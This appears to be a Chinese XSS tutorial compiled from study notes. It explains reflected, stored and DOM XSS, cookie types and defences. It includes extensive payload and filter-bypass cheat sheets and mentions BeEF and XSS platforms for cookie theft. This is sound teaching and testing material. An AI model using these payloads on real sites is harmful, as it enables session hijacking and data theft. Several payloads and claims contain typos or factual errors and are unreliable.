XSS跨站脚本攻击

1. 引入

炸诈骗短信-----利用的是人性的弱点构造的恶意链接
人性的弱点----贪婪

恶意链接之后后会进行跳转，从而导致数据的丢失

2. XSS注入漏洞的简介

1. 什么是XSS漏洞

英文全称：Cross Site Scripting
中文名称：跨站脚本攻击、XSS注入漏洞
层叠样式表CSS(Cascading Style Sheets,)，层叠样式表出现在XSS漏洞之前，为了避免混淆所以改名为XSS

2. 如何进行攻击呢

恶意攻击者向web前端插入恶意的前端代码（核心是javascript代码），当用户浏览该网页时，嵌入其中的恶意代码将会被执行，从而达到攻击的目的。

3. 前端代码

html——编写网站的内容及结构--------聚焦于数据的展示
CSS——美化网页----让网站更加的漂亮
javascript——增加网站的动态效果及安全性验证

javascript

增加网站的动态效果及安全性验证

1. 作用

1. 人与网站互动
2. 前端与后端数据交互

2. 特点

1. 脚本编写语言----解释类型的语言
2. 基于对象的语言----万物皆对象---定义变量都是初始化对象的过程
1. 什么是对象
给一个事物定义一个模板，通过给模板复制就能制造一个不一样的同类事物
3. 简单性
语言结构与C语言相同，面向人。----高级语言
4. 动态性----弱类型语言
不需要申明变量的类型的，类型由变量的值决定
5. 跨平台性
js的解析器在在浏览器，只要操作系统能够安装浏览器就可以解析JS代码
6. 安全性
js代码获取的数据是网络数据，但不能不具备与操作系统交互的功能

3. 与java的关系

js与JAVA没半毛钱关系

3. 原理----看数据流

由于用户不可控输入，攻击者可任意的输入前端代码，当前代码拼接成静态网页，然后在被攻击者的电脑上执行后，可导致数据的丢失。

1. 用户不可控输入------前端输入的数据被后端接受后没有进行严格的安全性处理就直接使用
2. web中数据输出的过程实际上就是将数据拼接成静态网站然后将数据发送到客户端的过程。
3. 如果输出的数据中含有恶意的js代码，从而造成风险。

4. 简单利用

payload----一种以JSON格式进行数据传输的一种方式。

http可能会传输payload，如果不限制其请求的方式(那么请求的方法就是OPTIONS)或者响应的状态码，其包含元数据，头部区域和数据。

如果数据是通过正常的put或者post方法发送的，那么payload就是一个http请求起始行紧接一个CRLF后面的那一部分。
payload和formData有什么不同

5. 危害—看作用点-----前端

1. 盗取被攻击者的cookie值，进行身份冒充

2. 网页篡改-------js中某些函数可以获取并且重新复制HTML的标签值

3. 删除页面

4. 流量劫持
	1. 增大流量
		1. 正常操作---引流----送钱、打广告、、
		2. 非常规------利用XSS漏洞自动请求流量较小的网站或在其他网站上添加二维码------违法的

5. 钓鱼网站

6. 配合CSRF攻击--------ajax、window.location

6. 分类

1. 反射型XSS---------数据会经过服务器端，不会到达数据库，输入一次攻击代码只攻击一次，非持久型XSS
		 攻击代码输入后在后端会直接输出到前端触发
2. 存储型XSS---------数据会经过服务器端，会到达数据库，输入一次攻击代码攻击多次，持久型XSS
	 	攻击代码会直接存放到数据数据库
3. DOM型XSS--------数据会经过服务器端，不会到达数据库，输入一次攻击代码只攻击一次，非持久型XSS
	 	 输入的恶意代码不会经过服务器，在前端被js代码直接读取放置到前端的标签中，是一种特殊的反射型XSS

7. 利用流程

1. 找注入点
   找到数据输入的地方
2. 判断回显位置—输入的数据在什么地方输出
   如果输入的数据能够在前端进行输出，则可以证明输入的前段恶意代码在没有安全性处理的情况下能够输出前端，从而造成风险。
3. 构造基础的payload

病毒通常会做一些有害的或者恶性的动作。在病毒代码中实现这个功能的部分叫做“有效负载”（payload）。

4. 进行提交payload
5. 分析响应状况
6. 如果成功解析则XSS存在
7. 反之考虑绕过
8. 确认漏洞
   如果响应达到了预期，则说明漏洞存在，反之不存在。

8. 难度

高危漏洞但漏洞库不一定接受此漏洞，存储型XSS肯定被接受。

1. 反射型攻击难度较高

1. 如何发送含有payload的连接呢---社工------效率很低
2. 影响面较小

2. 存储型XSS攻击难度较小

1. 攻击者将恶意代码写入数据库，只要访问该网站的用户必定中招。

9. 防御

1. 过滤-----将关键的字符过滤掉
2. 实体化编码-----将特殊字符转换成字符串

概述：

主要指攻击者可以再页面中插入恶意脚本代码，当受害者访问这些页面时，浏览器会解析并执行这些恶意代码，从而达到窃取用户身份、钓鱼、传播恶意代码和控制用户浏览器等行为

产生原因：

由于web程序对用户的输入过滤不足、，导致用户输入的恶意HTML/Javascript 代码注入到网页中，混淆原有语义，产生新的恶意语句。在其他用户访问网页时，浏览器就会触发恶意的网页代码，从而达到XSS攻击的目的

分类：

反射型：恶意代码并没有保存在目标网站，通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击
输入：

输入语句被写入了html，我点击submit就会弹出用户的cookie

存储型：也叫持久性XSS，当一个玉面（如留言板）有存储型时，插入的的恶意XSS代码会存储到数据库中 ，当访问此页面查看留言时，web程序会从数据库中取出恶意代码插入到页面，导致浏览器触发XSS

构造这样的payload

，现在我们重新访问页面，还是会依次弹处hello和nihao，因为我们提交的语句已经被写入数据库中了

Dom型：通过修改页面的DOM节点形成的XSS，从效果上来说也是反射型。
反射型或存储型时服务器将提交的内容反馈到了html源码内，导致触发XSS。也就是说返回到html源码中可以看到触发xss的代码。DOM型XSS只与客户端上的js交互，也就是说提交的恶意代码，被放到了js中执行，然后显示出来
不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model，DOM)的一种漏洞，DOM-XSS是通过url 传入参数去控制触发的

是因为js代码执行了我们输入的payload，而不是html

查找XSS漏洞探测

寻找web应用上的输入与输出口（例如网站输入框、URL参数等等），在可控参数中提交<script>alert(/xss/)</script>等攻击字符串，观察输出点是否对这些字符串进行转移、过滤、实体编码等处理。

这好像也是xss啊？但其实不是，我们右击选择编辑为html

发现他是经过url编码的，所以我们输入的payload被进行了编码再被放进html中，从而防止了xss的产生，所以并不会混淆语义。
但是显示在页面中的时候会进行url解码

常用探测向量

所有标签的 > 都可以用 // 代替， 例如 <script>alert(1)</script//

<script>alert(1)</script>
<img scr=x onerror=prompt(1);>
<audio scr=x onerror=prompt(1);>
<a href="http://www.google.com">Clickme</a>
<svg onload=prompt(1);>
<svg οnlοad="alert(1)"//   
<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>
<style οnlοad=alert(1)></style>

获得cookie

黑客在留言板中插入恶意代码
受害者访问被植入恶意代码的页面
恶意代码将cookir发送给黑客的服务器

一般使用xss平台生成payload，受害者执行之后cookie会被发送到xss平台

一般需要自行搭建xss平台
蓝莲花xss平台搭建教程

内网信息获取

https://github.com/BlackHole1/WebRtcXSS
该平台可以利用xss获取受害者的网络信息，扫描内网存在的漏洞并利用

BEEF（重要）

kali自带
beef利用简单的xss漏洞，通过一段编写好的js代码（hook.js)控制目标主机的浏览器，通过目标主机浏览器获得该主机的详细信息，并进一步扫描内网

XSS绕过

实际环境中，开发人员会对用户的输入进行相应的过滤，这时我们需要fuzz绕过

常见绕过：

大小写转换：<ScrIpt>AlerT("XSS");</SCRiPt>

闭合标签: ><script>alert("XSS");</script>

Hex编码: <scrIpt>alert("XSS");</script>转换为%3c%73%63%72%49%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3b%3c%2f%73%63%72%69%70%74%3e

利用html属性 : 
<img src="javascript:alert("xss");">

空格/tab/回车:
<img src="java script:alert('xss);"width=100>

字符编码
%cl;alert(/xss/.);//

圆括号过滤
<a onmouseover="javascript:window.onerror=alert;throw 1>

;:被过滤
<svg><script>alert&#40/1/&#41</script>

实体解码
&It:/script&gt;&lt;script&gt;alert(1)&It;/script&gt;

编码
使用十六进制、Unicode、HTML等进行编码

Alert被过滤
使用prompt和confirm替代

XSS跨站脚本攻击漏洞

0x01 XSS 背景

思科2018年度安全报告的结果显示，40%的能使网络瘫痪的攻击都是XSS攻击，这是最常用的攻击技术。当攻击者使用web应用程序在用户的计算机上发送或执行恶意代码时，就会发生这种特殊的攻击。

随着应用层的攻击越来越多，它已经成为网络安全的严重威胁。
对于大量应用程序来说，这已经是最大的安全性问题，特别是那些高可用性操作或优先服务中实现的应用程序，如医疗、银行、电子商务等。

根据**《2018年全球安全报告》(global security report 2018)给出的数据，平均每个应用程序大约有11个漏洞隐患。
这份报告显示，网络攻击正变得越来越具体、越来越频繁、越来越复杂。

其中，所占攻击比重最大的是跨站点脚本攻击(XSS)， 占总体攻击的40%,紧接着是SQL注入24%，cross-section为7%**，本地文件包含4%，分布式拒绝服务(DDoS)为3%。

当web应用程序从受害者计算机的浏览器执行恶意代码(通常以脚本的形式)时，就会发生XSS攻击。通过这种攻击，攻击者会窃取个人信息，或者窃取用户的cookies。

根据CWE/SANS列出的前25个最危险的漏洞，分为三类

• 组件之间的不安全交互(6个错误)
• 风险资源管理(8个错误)
• 多孔性防御(11处错误)

0x02 XSS 概论

为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击，攻击者在可信的网页中嵌入恶意代码，用户访问可信网页时触发XSS而被攻击。

利用XSS漏洞

web应用程序的内容可用来插入各种广告，影响商业网站的声誉或欺骗用户。
从开放会话中窃取会话cookie，并在这些会话在线时提取信息。
窃取或冒充合法用户的身份，窃取个人信息。
如果攻击者滥用这些被窃取的信息，用户的HTTP会话可能会被破坏或劫持。

XSS攻击的类型

反射型XSS:

在这种类型中，攻击者放置一个脚本来窃取受害者的cookie，接收到该cookie后，攻击者可以使用受害者的权限执行操作，而不需要使用任何类型的密码。
这种攻击在搜索引擎中很常见，通常是通过表单、url、cookies、flash程序甚至视频注入代码。
通过这种方式，代码可通过第三种机制被重定向。例如，通过电子邮件，攻击者可以说服用户点击message中的链接来执行任何JavaScript代码。其结果是将用户的流量重定向到攻击者的web应用程序。如果所述Web应用程序存在XSS漏洞，则其执行将在承载该应用程序的Web站点的可信环境中执行。

存储型XSS:

攻击者将HTML代码直接注入允许访问的web页面或站点。
这种攻击需要编程标记(如JavaScript脚本)。这些代码在第一次攻击后对所有用户都是永久的。
攻击者发送的数据永久地存储在服务器上，然后显示给访问网站的用户。其结果包括:允许执行代码来获得提升的特权，默认用户激活了他们的管理员帐户。

DOM型XSS:

被认为是一种更复杂、鲜为人知或常见的攻击。不同之处在于，恶意代码是通过URL注入的，而不是在源代码中作为web的一部分加载的。
检测起来比较困难，它被认为是一个本地的XSS。
当一个被感染的页面被打开时，恶意代码会利用一些漏洞将自己安装到web浏览器的一个文件中，并且在没有任何预先验证的情况下执行。
与反射行XSS一样的是，这种攻击需要用户单击链接，因此web页面上的脚本选择URL变量并执行它所包含的代码。这种方法在窃取会话cookie方面更有效。

泄露存储在用户cookies中的信息:用户可以在客户端创建一个脚本，该脚本一旦执行，就会执行一些活动，比如将站点中的所有cookie解析为一个特定的电子邮件地址。

通过XSS攻击窃取COOKIE

这些攻击通常用于在数据库中窃取cookies。因此，攻击者执行任意脚本，从受害者的计算机中提取个人信息。

默认情况下，cookie是维护用户和web应用程序之间的会话身份验证的机制。但是，它们有固有的安全弱点，允许攻击这些会话的完整性。建议使用HTTPS协议来保护cookie，但是性能方面的成本很高，特别是对于那些高分布度的应用程序。

另一方面，即使启用了HTTPS协议，cookie也可以以多种方式公开。大多数cookie以文本文件或小型数据库的形式存储在用户的计算机中，如SQLite格式(Mozilla Firefox)。它的目标是存储与导航首选项、会话、凭据,诸如浏览器类型或用于访问网站的设备类型等相关的信息。

0x03 最常见的cookies类型

a.Session Cookie

这个类型的cookie只在会话期间内有效，即当关闭浏览器的时候，它会被浏览器删除。
设置session cookie的办法是：在创建cookie不设置Expires即可。

b.Persistent Cookie

持久型cookie顾名思义就是会长期在用户会话中生效。当你设置cookie的属性Max-Age为1个月的话，那么在这个月里每个相关URL的http请求中都会带有这个cookie。所以它可以记录很多用户初始化或自定义化的信息，比如什么时候第一次登录及弱登录态等。

c.Secure cookie

安全cookie是在https访问下的cookie形态，以确保cookie在从客户端传递到Server的过程中始终加密的。有效的降低了cookie被盗取的概率。

d.HttpOnly Cookie

目前主流的浏览器已经都支持了httponly cookie。
IE5+/Firefox 1.0+/Opera 8.0+/Safari/Chrome
在支持httponly的浏览器上，设置成httponly的cookie只能在http(https)请求上传递。也就是说httponly cookie对客户端脚本语言(JavaScript)无效，从而避免了跨站攻击时JS偷取cookie的情况。当使用javascript在设置同样名字的cookie时，只有原来的httponly值会传送到服务器。

e.3rd-party cookie

第一方cookie是cookie种植在浏览器地址栏的域名或子域名下。
第三方cookie则是种植在不同于浏览器地址栏的域名下。例如：用户访问a.com时，在ad.google.com设置了个cookie，在访问b.com的时候，也在ad.google.com设置了一个cookie。

f.Super Cookie

Super Cookie是设置公共域名前缀上的cookie。通常a.b.com的cookie可以设置在a.b.com和b.com，而不允许设置在.com上。

目前，大多数web应用程序使用cookie来维护与用户的会话状态，也就是说，cookie是在用户通过身份验证(会话cookie)后发送的。对于以后的连接，将不需要额外的身份认证，因为验证后的cookie只会在允许新请求时进行验证。

这种身份验证功能使cookies成为攻击者的潜在目标，因为它们是由网站创建的，包含少量数据，可以在发送方和接收方之间发送。

例如，一个用户第一次访问一个web页面，他的计算机上保存了一个cookie。如果用户稍后访问同一页面，网站服务器会请求相同的cookie用站点的新配置更新它，这就是用户的访问变得如此个性化的原因。

当前补救率根据类型的漏洞

此外，如图，开发人员总是面向修复或纠正最易访问或最容易的问题。例如，应用程序的错误设置的补救率为74%，未修补的库的补救率为62%。然而，最复杂和困难的解决方案仍然是XSS(38%)和SQL注入(32%)

根据XSS漏洞的类别确定修复率

0x04常见标签

**<scirpt>**
<scirpt>alert("xss");</script>

**<img>标签**
<img src=javascript:alert("xss")>
<IMG SRC=javascript:alert(String.formCharCode(88,83,83))>
<img scr="URL" style='Xss:expression(alert(/xss));'
<img STYLE="background-image:url(javascript:alert('XSS'))">
<img src="x" onerror=alert('xss')>
<img src="1" onerror=eval("alert('xss')")>
<img src=1 onmouseover=alert('xss')>

**<a>标签**
<a href="javascript:alert('xss')">aa</a>
<a href=javascript:eval(alert('xss'))>aa</a>
<a href="javascript:aaa" onmouseover="alert(/xss/)">a</a>
<a href="" onclick=alert('xss')>aa</a>
<a href="" onclick=eval(alert('xss'))>aa</a>
<a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>

**input标签**
<input value="" onclick=alert('xss') type="text">
<input onfocus="alert('xss');">
<input name="name" value="" onmouseover=prompt('xss') bad="">
<input onblur=alert("xss") autofocus><input autofocus>
<input onfocus="alert('xss');" autofocus>
<input name="name" value=""><script>alert('xss')</script>

**<form>**
<form action=javascript:alert('xss') method="get">
<form action=javascript:alert('xss')>
<form method=post action=aa.asp? onmouseover=prompt('xss')>
<form method=post action=aa.asp? onmouseover=alert('xss')>
<form action=1 onmouseover=alert('xss)>
<form method=post action="data:text/html;base64,<script>alert('xss')</script>">
<form method=post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

**<details>**
<details ontoggle="alert('xss');">
<details open ontoggle="alert('xss');">

**<svg>**
<svg onload=alert("xss");>

**<select>**
<select onfocus=alert(1)></select>
<select onfocus=alert(1) autofocus>

**<iframe>标签**
<iframe onload=alert("xss");></iframe>
<iframe src=javascript:alert('xss');height=5width=1000 /><iframe>
<iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe>
<iframe src="data:text/html;base64,<script>alert('xss')</script>">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
<iframe src="aaa" onmouseover=alert('xss') /><iframe>
<iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>

**svg<>标签**
<svg onload=alert(1)>

**<video>**
<video><source onerror="alert(1)">

**<audio>**
<audio src=x onerror=alert("xss");>

**<body>**
<body/onload=alert("xss");>
<body onscroll=alert("xss");><br><br><br><br>

**<textarea>**
<textarea onfocus=alert("xss"); autofocus>

**<keygen>**
<keygen autofocus onfocus=alert(1)>

**<marquee>**
<marquee onstart=alert("xss")></marquee>

**<isindex>**
<isindex type=image src=1 onerror=alert("xss")>

**expression属性**
<img style="xss:expression(alert('xss''))"> 
<div style="color:rgb(''x:expression(alert(1))"></div>
<style>#test{x:expression(alert(/XSS/))}</style>

**background属性**
<table background=javascript:alert(1)></table>

0x05 检测XSS的办法

内容安全策略(CSP)

内容安全策略是一种安全标准，用于防止XSS、点击劫持攻击和其他类型的弹出式攻击，这些攻击是在网页内容中执行恶意内容的结果。它是W3C工作组关于现代web浏览器支持的web应用程序安全性的建议。

使用这种方法，开发人员必须声明浏览器将上载到其网站的内容的批准来源，例如，JavaScript、CSS、HTML框架、字体、图像、可嵌入对象(如Java、ActiveX、音频和视频文件)和其他HTML5特性

输入文本验证

此方法是防御XSS攻击的更常见类型。这种对不可靠的文本条目的处理是通过模块的编程来过滤和分析文本的。

库或框架

包括微软的反XSS库，这是一个免费开放的集合，收集了开发人员构建一个名为OWASP ESAPI和ApacheWicket的安全web应用程序所需的所有安全方法。

XSSer

也称为跨站“脚本”，是一个用于检测和利用XSS漏洞的自动Web测试框架工具，它包含几个试图绕过某些过滤器的选项和一些代码注入的特殊技术。它是由OWASP开发的一种开源项目XSS。